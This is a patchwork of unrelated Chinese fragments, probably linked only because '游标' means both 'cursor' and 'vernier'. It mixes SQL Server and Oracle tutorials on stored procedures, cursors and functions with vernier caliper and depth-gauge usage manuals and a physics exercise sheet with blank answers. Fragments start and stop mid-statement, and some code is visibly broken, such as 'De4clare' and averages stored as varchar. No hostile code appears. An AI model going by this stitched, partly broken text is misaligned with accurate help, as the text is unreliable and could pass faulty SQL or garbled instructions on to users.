use Studb go execute proc_exp@sname='刘招香' go (3)修改存储过程proc_exp,要求实现如下功能:输入学生学号,根据该学生所选课程的平均成绩给出提示信息,即如果平均成绩在60分以上,显示“成绩合格,成绩为XX分”,否则显示“成绩不合格,成绩为XX分”;然后调用存储过程proc_exp,输入学号0705010131,显示成绩是否合格。 alter procedure proc_exp @student_sno varchar (20) as declare@avg varchar(20) set@avg=(select AVG(score) from student_course where sno=@student_sno) if@avg>=60 print'成绩合格,成绩为'+@avg+'分' else print'成绩不合格,成绩为'+@avg+'分' 运行结果代码: use Studb go declare@student_sno varchar (20) select@student_sno='0705010131' exec proc_exp@student_sno (4)创建名为proc_add的存储过程,要求实现以下功能:向student_course表中添加学生记录;然后调用存储过程proc_add,向student_course表中添加学生成绩记录。create procedure proc_add @sno char(10), @cno char(10), @score tinyint
游标卡尺及万能角度尺的使用说明(有图示)
一、游标卡尺的使用说明 利用游标原理对两测量面相对移动分隔的距离进行读数的测量器具。游标卡尺(简称卡尺)。 游标卡尺可以测量产品的内、外尺寸(长度、宽度、厚度、内径和外径),孔距,高度和深度等。 游标卡尺根据其结构可分单面卡尺、双面卡尺、三用卡尺等。 (1)单面卡尺带有内外量爪,可以测量内侧尺寸和外侧尺 寸(图1-1)。 (2)双面卡尺的上量爪为刀口形外量爪,下量爪为内外量爪,可测 内外尺寸(图1-2)。 (3)三用卡尺的内量爪带刀口形 ,用于测量内尺寸;外量爪带平面 和刀口形的测量面,用于测量外尺寸;尺身背面带有深度尺,用于测量深度和高度(图1-3)。 (4)标卡尺读数原理与读数方法 为了掌握游标卡尺的正确使用方法,必须学会准确读数和正确操作。 游标卡尺的读数装置,是由尺身和游标两部分组成,当尺框上的活动测量爪与尺身上的固定测量爪贴合时,尺框上游标的“0”刻线(简称游标零线)与尺身的“0”刻线对齐,此时测量爪之间的距离为零。测量时,需要尺框向右移动到某一位置,这时活动测量爪与固定测量爪之间的距离,就是被测尺寸,见图1-4。假如游标零线与尺身上表示30mm 的刻线正好对齐,则说明被测尺寸是30mm ;如果游标零线在尺身上指示的尺数值比30mm 大一点,应该怎样读数呢?这时,被 刀口内测量爪 尺身尺框紧固螺钉 游标深度尺外测量爪图1-3
测尺寸的整数部分(为30mm),如上所述可从游标零线左边的尺身刻线上读出来 (图中箭头所指刻线),而比1mm小的小数部分则是借助游标读出来的(图中● 图1-4:游标卡尺测量尺寸 游标的小数部分读数方法是首先看游标的哪一条线与尺身刻线对 齐;然后把游标这条线的顺序数乘以游标读数值,就得出游标的读数,即 游标的读数=游标读数值X游标对齐刻线的顺序数 游标卡尺读数时可分三步: A、先读整数——看游标零线的左边,尺身上最靠近的一条刻线的数值,读出被测尺寸的整数部分; B、再读小数——看游标零线的右边,数出游标第几条刻线与尺身的数值刻线对齐,读出被测尺寸的小数部分(即游标读数值乘其对齐刻线的顺序数); C、得出被测尺寸——把上面两次读数的整数部分和小数 部分相加,就是卡尺的所测尺寸。 (1)注意事项 A、清洁量爪测量面。 B、检查各部件的相互作用;如尺框和微动装置移动灵活,紧固螺钉能否起作用。 C、校对零位。使卡尺两量爪紧密贴合,应无明显的光隙,主尺零线与游标尺零线应对齐。 D、测量结束要把卡尺平放,尤其是大尺寸的卡尺更应该注意,否则尺身会弯曲变形。 E、带深度尺的游标卡尺,用完后,要把测量爪合拢,否侧较细的深度尺露在外边,容易变形甚至折断。 F、卡尺使用完毕,要擦净上油,放到卡尺盒内,注意不要锈 蚀或弄脏。
SQL Server数据库入门学习总结 经过一段时间的学习,也对数据库有了一些认识。 数据库基本是由表,关系,操作组成;对于初学者首先要学的: 1.数据库是如何存储数据的 表,约束,触发器 2.数据库是如何操作数据的 insert,update,delete T-sql 函数存储过程触发器 3.数据库是如何显示数据的 select SQLServer数据库学习总结 1.SQL基础 SQL Server2000安装、配置,服务器启动、停止,企业管理器、查询分析器 第一代数据库--网状数据库和层次数据库;第二代数据库--关系数据库 数据库(DB);数据库管理系统(DBMS);数据库系统(DBS) SQL Server 2000 提供了不同版本:企业版、标准版、个人版、开发版 SQL Server中的数据类型:整数:int,smallint,tinyint,bigint;浮点数:real,float,decimal;二进制:binary,varbinary;逻辑:bit;字符:char,nchar,varchar,nvarchar;文本和图形:text,ntext,image;日期和时间:datetime,smalldatetime;货币:money,smallmoney 数据库的创建和删除;数据库表的创建、修改和删除 数据完整性:实体完整性:Primary Key,Unique Key,Unique Index,Identity Column;域完整性:Default,Check,Foreign Key,Data type,Rule;参照完整性:Foreign Key,Check,Triggers,Procedure;用户定义完整性:Rule,Triggers,Procedure;Create Table中得全部列级和表级约束 SQL Server中有5种约束:主键约束(Primary Key Constraint)、默认约束(Default Constraint)、检查约束(Check Constraint)、唯一性约束(Unique Constraint)、外键约束(Foreign Key Constraint). 关系图 数据库设计的步骤:需求分析、概念结构设计、逻辑结构设计、数据库物理设计、数据库实施、数据库运行和维护 两个实体之间的联系:一对一(1:1)、一对多(1:n)、多对多(m:n) 实体关系模型-- E-R图
深度游标卡尺使用方法
深度游标卡尺 深度游标卡尺用于测量凹槽或孔的深度、梯形工件的梯层高度、长度等尺寸,平常被简称为“深度尺”。是一种用游标读数的深度量尺。 深度游标卡尺使用注意事项 深度游标卡尺是比较精密的量具,使用是否合理,不但影响深度游标卡尺本身的精度和使用寿命,而且对测量结果的准确性,也有直接影响。必须正确使用深度游标卡尺。 1.使用前,认真学习并熟练掌握深度游标卡尺的测量、读数方法。 2.搞清楚所用深度游标卡尺的量程、精度是否符合被测零件的要求。 3.使用前,检查深度游标卡尺应完整无任何损伤,移动尺框3时,活动要自如 不应有过松或过紧,更不能有晃动现象。 4.使用前,用纱布将深度游标卡尺擦拭干净,检查尺身4和游标5的刻线是否 清晰,尺身有无弯曲变形、锈蚀等现象。校验零位、检查各部分作用是否正常。 5.使用深度游标卡尺时,要轻拿轻放,不得碰撞或跌落地下。使用时不要用来 测量粗糙的物体,以免过早损坏测量面。 6.移动卡尺的尺框和微动装置时,不要忘记松开紧固螺钉4;但也不要松得过 量,以免螺钉脱落丢失。 7.测量前,应将被测量表面擦干净,以免灰尘、杂质磨损量具。 8.卡尺的测量基座和尺身端面应垂直于被测表面并贴合紧密,不得歪斜,否则 会造成测量结果不准。 9.应在足够的光线下读数,两眼的视线与卡尺的刻线表面垂直,以减小读数误 差。 10.在机床上测量零件时,要等零件完全停稳后进行,否则不但使量具的测量面 过早磨损而失去精度,且会造成事故。 11.测量沟槽深度或当其他基准面是曲线时,测量基座的端面必须放在曲线的 最高点上,测量出的深度尺寸才是工件的实际尺寸,否则会出现测量误差。
SQL SERVER函数大全 SQL SERVER命令大全 SQLServer和Oracle的常用函数对比 1.绝对值 S:select abs(-1) value O:select abs(-1) value from dual 2.取整(大) S:select ceiling(-1.001) value O:select ceil(-1.001) value from dual 3.取整(小) S:select floor(-1.001) value O:select floor(-1.001) value from dual 4.取整(截取) S:select cast(-1.002 as int) value O:select trunc(-1.002) value from dual 5.四舍五入 S:select round(1.23456,4) value 1.23460 O:select round(1.23456,4) value from dual 1.2346 6.e为底的幂 S:select Exp(1) value 2.7182818284590451 O:select Exp(1) value from dual 2.71828182 7.取e为底的对数 S:select log(2.7182818284590451) value 1 O:select ln(2.7182818284590451) value from dual; 1 8.取10为底对数 S:select log10(10) value 1 O:select log(10,10) value from dual; 1 9.取平方 S:select SQUARE(4) value 16 O:select power(4,2) value from dual 16
在SQL Server在线图书或者在线帮助系统中,函数的可选参数用方括号表示。在下列的CONVERT()函数例子中,数据类型的length和style参数是可选的: CONVERT (data-type [(length)], expression[,style]) 可将它简化为如下形式,因为现在不讨论如何使用数据类型: CONVERT(date_type, expression[,style]) 根据上面的定义,CONVERT()函数可接受2个或3个参数。因此,下列两个例子都是正确的: SELECT CONVERT(Varchar(20),GETDATE()) SELECT CONVERT(Varchar(20),GETDATE(), 101) 这个函数的第一个参数是数据类型Varchar(20),第2个参数是另一个函数GETDATE()。GETDATE()函数用datetime数据类型将返回当前的系统日期和时间。第2条语句中的第3个参数决定了日期的样式。这个例子中的101指以mm/dd/yyyy格式返回日期。本章后面将详细介绍GETDATE()函数。即使函数不带参数或者不需要参数,调用这个函数时也需要写上一对括号,例如GETDATE()函数。注意在书中使用函数名引用函数时,一定要包含括号,因为这是一种标准形式。 确定性函数 由于数据库引擎的内部工作机制,SQL Server必须根据所谓的确定性,将函数分成两个不同的组。这不是一种新时代的信仰,只和能否根据其输入参数或执行对函数输出结果进行预测有关。如果函数的输出只与输入参数的值相关,而与其他外部因素无关,这个函数就是确定性函数。如果函数的输出基于环境条件,或者产生随机或者依赖结果的算法,这个函数就是非确定性的。例如,GETDATE()函数是非确定性函数,因为它不会两次返回相同的值。为什么要把看起来简单的事弄得如此复杂呢?主要原因是非确定性函数与全局变量不能在一些数据库编程对象中使用(如用户自定义函数)。部分原因是SQL Server缓存与预编译可执行对象的方式。例如,即席查询可以使用任何函数,不过如果打算构建先进的、可重用的编程对象,理解这种区别很重要。 以下这些函数是确定性的: ●?AVG()(所有的聚合函数都是确定性的) ●?CAST() ●?CONVERT() ●?DATEADD() ●?DATEDIFF() ●?ASCII() ●?CHAR() ●?SUBSTRING() 以下这些函数与变量是非确定性的: ●?GETDATE()
SQLServer索引结构及其使用(三) 实现小数据量和海量数据的通用分页显示存储过程 建立一个 Web 应用,分页浏览功能必不可少。这个问题是数据库处理中十分常见的问题。经典的数据分页方法是:ADO 纪录集分页法,也就是利用ADO自带的分页功能(利用游标)来实现分页。但这种分页方法仅适用于较小数据量的情形,因为游标本身有缺点:游标是存放在内存中,很费内存。游标一建立,就将相关的记录锁住,直到取消游标。游标提供了对特定集合中逐行扫描的手段,一般使用游标来逐行遍历数据,根据取出数据条件的不同进行不同的操作。而对于多表和大表中定义的游标(大的数据集合)循环很容易使程序进入一个漫长的等待甚至死机。 更重要的是,对于非常大的数据模型而言,分页检索时,如果按照传统的每次都加载整个数据源的方法是非常浪费资源的。现在流行的分页方法一般是检索页面大小的块区的数据,而非检索所有的数据,然后单步执行当前行。 最早较好地实现这种根据页面大小和页码来提取数据的方法大概就是“俄罗斯存储过程”。这个存储过程用了游标,由于游标的局限性,所以这个方法并没有得到大家的普遍认可。 后来,网上有人改造了此存储过程,下面的存储过程就是结合我们的办公自动化实例写的分页存储过程: CREATE procedure pagination1 (@pagesize int, --页面大小,如每页存储20条记录 @pageindex int --当前页码 ) as set nocount on begin declare @indextable table(id int identity(1,1),nid int) --定义表变量 declare @PageLowerBound int --定义此页的底码 declare @PageUpperBound int --定义此页的顶码
1、建表格: Create TABLE table_name( column1 DATATYPE [NOT NULL] [NOT NULL PRIMARY KEY], column2 DATATYPE [NOT NULL], ...) 说明: DATATYPE --是资料的格式,详见表。 NUT NULL --可不可以允许资料有空的(尚未有资料填入)。 PRIMARY KEY --是本表的主键。 2、更改表格 Alter TABLE table_name ADD COLUMN column_name DATATYPE 说明:增加一个栏位(没有删除某个栏位的语法。 Alter TABLE table_name ADD PRIMARY KEY (column_name) 说明:更改表得的定义把某个栏位设为主键。 Alter TABLE table_name Drop PRIMARY KEY (column_name) 说明:把主键的定义删除。 3、建立索引 Create INDEX index_name ON table_name (column_name) 说明:对某个表格的栏位建立索引以增加查询时的速度。 4、删除 Drop table_name Drop index_name 二、的资料形态DATATYPEs smallint 16 位元的整数。 interger 32 位元的整数。 decimal(p,s) p 精确值和s 大小的十进位整数,精确值p是指全部有几个数(digits)大小值,s是指小数点後有几位数。如果没有特别指定,则系统会设为p=5; s=0 。
USE[zhuhaioa7-4] GO /****** Object: StoredProcedure [dbo].[proc_records] Script Date: 12/26/2014 20:31:09 ******/ SET ANSI_NULLS ON GO SET QUOTED_IDENTIFIER ON GO ALTER procedure[dbo].[proc_records] as DECLARE@map_table table(r_key varchar(100),r_value varchar(50)) DECLARE@type_id varchar(40) DECLARE@type_name varchar(50) DECLARE@project_id varchar(40) DECLARE@project_name varchar(50) DECLARE@payTypeMoney numeric(16, 2) DECLARE@sumPayTypeMoney numeric(16, 2) BEGIN set@payTypeMoney= 0 set@sumPayTypeMoney= 0 --查询项目列表 DECLARE project_cursor CURSOR for select ep_id,ep_name from AB_engineeringPhase where account_id='2' open project_cursor fetch next from project_cursor into@project_id,@project_name while@@FETCH_STATUS= 0 begin
5 20 25 15 游标卡尺和千分尺专项练习 1.游标卡尺 ⑴10分度的游标卡尺。游标上相邻两个刻度间的距离为,比主尺上相邻两个刻度间距离小。读数时先从主尺上读出厘米数和毫米数,然后用游标读出毫米位的数值:游标的第几条刻线跟主尺上某一条刻线对齐,毫米位就读几(不能读某)。其读数准确到。 ⑵20分度的游标卡尺。游标上相邻两个刻度间的距离为,比主尺上相邻两个刻度间距离小。读数时先从主尺上读出厘米数和毫米数,然后用游标读出毫米以下的数值:游标的第几条刻线跟主尺上某一条刻线对齐,毫米以下的读数就是几乘毫米。其读数准确到。 ⑶50分度的游标卡尺。游标上相邻 两个刻度间的距离为0.98mm,比主尺上 相邻两个刻度间距离小0.02mm。这种卡 尺的刻度是特殊的,游标上的刻度值,就 是毫米以下的读数。这种卡尺的读数可以 准确到0.02mm。如右图中被测圆柱体的 直径为2.250cm。 要注意:游标卡尺都是根据刻线对齐 来读数的,所以都不再往下一位估读。 2.螺旋测微器 固定刻度上的最小刻度为(在中线的上侧);可动刻度每旋转一圈前进(或后退)。在可动刻度的一周上平均刻有50条刻线,所以相邻两条刻线间代表。读数时,从固定刻度上读取整、半毫米数,然后从可动刻度上读取剩余部分(因为是10分度,所以在最小刻度后应再估读一位),再把两部分读数相加,得测量值。上图中的读数应该是。 3.巩固练习 1.用游标卡尺测量摆球直径。游标位置如右图所示, 可知摆球直径是 mm。 2.有一游标卡尺,主尺的最小分度是1mm,游标上有20个小的等分刻度。用它测量一工件的长度,如下左图所示,图示的读数是 mm。 3.一游标卡尺的主尺最小分度为1mm,游标上有10个小等分间隔,现用 此 卡尺来测量工件的直径,如上右图所示。该工件的直径为__________mm。 4.用螺旋测微器测圆柱体直径时,示数如右图,此示数为 mm。 5. 下左图为用游标为50分度的卡尺(测量值可准确到0.02mm)测定某圆筒的内径时,卡尺 01234567890 01234567891
游标CURSOR的使用学习 游标的类型: 1,隐式游标:在 PL/SQL 程序中执行DML SQL 语句时自动创建隐 式游标,名字固定叫sql。 2,显式游标:显式游标用于处理返回多行的查询。 3,REF 游标:REF 游标用于处理运行时才能确定的动态 SQL 查询 的结果 一、隐式游标 在PL/SQL中使用DML语句时自动创建隐式游标 q隐式游标自动声明、打开和关闭,其名为 SQL q通过检查隐式游标的属性可以获得最近执行的DML 语句的信息q隐式游标的属性有: q%FOUND – SQL 语句影响了一行或多行时为 TRUE q%NOTFOUND – SQL 语句没有影响任何行时为TRUE q%ROWCOUNT – SQL 语句影响的行数 q%ISOPEN - 游标是否打开,始终为FALSE begin update student s set s.sage = s.sage + 10; if sql %FOUND then dbms_output.put_line('这次更新了' || sql% rowcount); else dbms_output.put_line('一行也没有更新'); end if; end; 在select中有两个中比较常见的异常: 1. NO_DATA_FOUND 2. TOO_MANY_ROWS declare sname1 student.sname%TYPE; begin
select sname into sname1 from student; if sql%found then dbms_output.put_line(sql%rowcount); else dbms_output.put_line('没有找到数据'); end if; exception when too_many_rows then dbms_output.put_line('查找的行记录多于1行'); when no_data_found then dbms_output.put_line('未找到匹配的行'); end; 显式游标: sqlserver与oracle的不同之处在于:最后sqlserver会deallocate 丢弃游标,而oracle只有前面四步:声明游标、打开游标、使用游标读取记录、关闭
SQLSERVER存储过程使用说明书 引言 首先介绍一下什么是存储过程:存储过程就是将常用的或很复杂的工作,预先用SQL语句写好并用一个指定的名称存储起来,并且这样的语句是放在数据库中的,还可以根据条件执行不同SQL语句,那么以后要叫数据库提供与已定义好的存储过程的功能相同的服务时,只需调用execute,即可自动完成命令。 请大家先看一个小例子: create proc query_book as select * from book go --调用存储过程 exec query_book 请大家来了解一下存储过程的语法。 Create PROC [ EDURE ] procedure_name [ ; number ] [ { @parameter data_type } [ VARYING ] [ = default ] [ OUTPUT ] ] [ ,...n ] [ WITH { RECOMPILE | ENCRYPTION | RECOMPILE , ENCRYPTION } ] [ FOR REPLICATION ] AS sql_statement [ ...n ] 一、参数简介 1、procedure_name 新存储过程的名称。过程名必须符合标识符规则,且对于数据库及其所有者必须唯一。 要创建局部临时过程,可以在 procedure_name 前面加一个编号 符 (#procedure_name),要创建全局临时过程,可以在 procedure_name 前面加两
个编号符 (##procedure_name)。完整的名称(包括 # 或 ##)不能超过 128 个字符。指定过程所有者的名称是可选的。 2、;number 是可选的整数,用来对同名的过程分组,以便用一条 Drop PROCEDURE 语句即可将同组的过程一起除去。例如,名为 orders 的应用程序使用的过程可以命名为 orderproc;1、orderproc;2 等。Drop PROCEDURE orderproc 语句将除去整个组。如果名称中包含定界标识符,则数字不应包含在标识符中,只应 在 procedure_name 前后使用适当的定界符。 3、@parameter 过程中的参数。在 Create PROCEDURE 语句中可以声明一个或多个参数。用户必须在执行过程时提供每个所声明参数的值(除非定义了该参数的默认值)。存储过程最多可以有 2100 个参数。 使用@符号作为第一个字符来指定参数名称。参数名称必须符合标识符的规则。每个过程的参数仅用于该过程本身;相同的参数名称可以用在其它过程中。默认情况下,参数只能代替常量,而不能用于代替表名、列名或其它数据库对象的名称。 4、data_type 参数的数据类型。所有数据类型(包括 text、ntext 和 image)均可以用作存储过程的参数。不过,cursor 数据类型只能用于 OUTPUT 参数。如果指定的数据类型为 cursor,也必须同时指定 VARYING 和 OUTPUT 关键字。 说明:对于可以是cursor 数据类型的输出参数,没有最大数目的限制。 5、VARYING 指定作为输出参数支持的结果集(由存储过程动态构造,内容可以变化)。仅适用于游标参数。 6、default 参数的默认值。如果定义了默认值,不必指定该参数的值即可执行过程。默认值必须是常量或 NULL。如果过程将对该参数使用 LIKE 关键字,那么默认值中可以包含通配符(%、_、[] 和 [^])。 7、OUTPUT
游标卡尺的使用方法游标卡尺读数方法 不知道怎么使用游标卡尺怎么办?不用担心,一起来看看出guo 为大家精心的“游标卡尺的使用方法游标卡尺读数方法”,欢迎大家阅读,供您参考。更多内容请关注出guo。 游标卡尺是工业上常用的测量长度的仪器,它由尺身及能在尺身上滑动的游标组成,如图2.3-1所示。若从背面看,游标是一个整体。游标与尺身之间有一弹簧片,利用弹簧片的弹力使游标与尺身靠紧。游标上部有一紧固螺钉,可将游标固定在尺身上的任意位置。 尺身和游标都有量爪,利用内测量爪可以测量槽的宽度和管的内径,利用外测量爪可以测量零件的厚度和管的外径。深度尺与游标尺连在一起,可以测槽和筒的深度。尺身和游标尺上面都有刻度。以准确到0.1毫米的游标卡尺为例,尺身上的最小分度是1毫米,游标尺上有10个小的等分刻度,总长9毫米,每一分度为0.9毫米,比主尺上的最小分度相差0.1毫米。量爪并拢时尺身和游标的零刻度线对齐,它们的第一条刻度线相差0.1毫米,第二条刻度线相差0.2毫米,第10条刻度线相差1毫米,即游标的第10条刻度线恰好与主尺的9毫米刻度线对齐。 当量爪间所量物体的线度为0.1毫米时,游标尺向右应移动0.1毫米。这时它的第一条刻度线恰好与尺身的1毫米刻度线对齐。同样当游标的第五条刻度线跟尺身的5毫米刻度线对齐时,说明两量爪之间有0.5毫米的宽度,依此类推。在测量大于1毫米的长度时,整的毫米数要从游标“0”线与尺身相对的刻度线读出。
读数时首先以游标零刻度线为准在尺身上读取毫米整数,即以毫米为单位的整数部分。然后看游标上第几条刻度线与尺身的刻度线对齐,如第6条刻度线与尺身刻度线对齐,则小数部分即为0.6毫米(若没有正好对齐的线,则取最接近对齐的线进行读数)。如有零误差,则一律用上述结果减去零误差(零误差为负,相当于加上相同大小的零误差),读数结果为: L=整数部分+小数部分-零误差判断游标上哪条刻度线与尺身刻度线对准,可用下述方法:选定相邻的三条线,如左侧的线在尺身对应线左右,右侧的线在尺身对应线之左,中间那条线便可以认为是对准了,如图2.3-4。 L= 对准前刻度+游标上第n条刻度线与尺身的刻度线对齐 *(乘以)分度值 如果需测量几次取平均值,不需每次都减去零误差,只要从最后结果减去零误差即可。 以刻度值0.02mm的精密游标卡尺为例,读数方法,可分三步; 1)根据副尺零线以左的主尺上的最近刻度读出整毫米数; 2)根据副尺零线以右与主尺上的刻度对准的刻线数乘上0.02 读出小数; 3)将上面整数和小数两部分加起来,即为总尺寸。 0.02mm游标卡尺的读数方法 如上图所示,副尺0线所对主尺前面的刻度64mm,副尺0线后的第9条线与主尺的一条刻线对齐。副尺0 线后的第9条线表示:
1.游标概述 由于SQLServer是使用结果集来处理数据,因此当需要逐条处理表中的记录时就必须使用游标来处理。游标一般被定义和使用在服务器端,当游标 开启后,服务器为每一个游标保持一个指针,用来前后检索数据。当游标大量的使用时,服务器端的负担很重。 2.游标的特性 A.种类:动态游标、静态游标和、键集游标和仅向前游标; 动态游标(Dynamic):可以监测对结果集的所有操作(增、删、改),前后滚动。当滚动时,动态游标反映结果集中所做的修改。 静态游标(Static):不能监测其他用户的所有操作,前后滚动。以快照形式把当前表存到Tempdb临时表中,执行指令后将结果集带给游标, 新的数据值不会显示在静态游标中。 键集游标(Keyset):可以监测用户对数据的修改,前后滚动。在Tempdb中利用主键实现对数据检索。 对于仅向前游标(Fast_only):该游标只能向前滚动。 B.功能:可设置游标结果为只读的,或可更新的;游标的移动类型等; 3 游标的状态 --声明 Declare cursor_ name Cursor for Select 语句 --打开 Open cursor_name --提取数据
Fetch next from cursor_name into 变量1,变量2 --关闭游标 Close cursor_name --释放游标 Deallocate cursor 4.例题 事例1、查询某个书店的订单的数量 --存储过程名称 StoreOrderSum --输入参数:@StoreName varchar(30) 书店名称 --返回参数:@SumQty int 订单数量 --定义静态游标名称:SalesQty Create procedure StoreOrderSum @StoreName varchar(30) As Declare SalesQty cursor static For select qty from sales where stor_id= (select stor_id from stores where stor_name like @storename+'%') Open SalesQty De4clare @Qty smallint Declare @sumqty int select @qty=0 select @sumqty=0